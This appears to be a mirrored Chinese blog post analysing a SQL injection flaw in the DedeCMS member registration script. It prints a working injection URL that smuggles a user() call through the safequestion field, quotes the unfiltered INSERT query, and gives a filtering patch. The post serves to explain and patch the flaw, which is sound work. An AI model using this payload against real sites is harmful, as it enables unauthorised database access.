zoukankan      html  css  js  c++  java
  • dedecms /member/reg_new.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞


    2. 漏洞触发条件

    http://127.0.0.1/dedecms5.5/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
    //把vdcode=slum改成当前的验证码

    Relevant Link:

    http://0day5.com/archives/1315
    http://www.odaysec.com/post/1cb671b0_2709bbf


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/reg_new.php

    ..
    $jointime = time();
    $logintime = time();
    $joinip = GetIP();
    $loginip = GetIP();
    $pwd = md5($userpwd); 
    
    $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
    
    //未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
    $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
    `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
    VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
    '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; 
    
    if($dsql->ExecuteNoneQuery($inQuery))
    ..


    5. 防御方法

    /member/reg_new.php

    ..
    $jointime = time();
    $logintime = time();
    $joinip = GetIP();
    $loginip = GetIP();
    $pwd = md5($userpwd);
    /* 对$mtype、$safeanswer、$safequestion进行有效过滤 */
        $mtype = HtmlReplace($mtype,1);
        $safeanswer = HtmlReplace($safeanswer);
        $safequestion = HtmlReplace($safequestion);
    /* */
    
    $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
    
    $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
    `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
    VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
    '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
    if($dsql->ExecuteNoneQuery($inQuery))
    {
    ..


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    mysql ACID与四种隔离级别归纳总结
    python django查询12306火车票
    python json dumps与loads有可能犯的错误
    python出现UnicodeEncodeError有可能产生的另一个原因
    python安装新版本及pip
    Django添加防跨站请求伪造中间件
    python List的一些相关操作
    mysql中varbinary、binary、char、varchar异同
    (原创)如何使用boost.asio写一个简单的通信程序(一)
    (原创)用c++11实现简洁的ScopeGuard
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4519267.html
Copyright © 2011-2022 走看看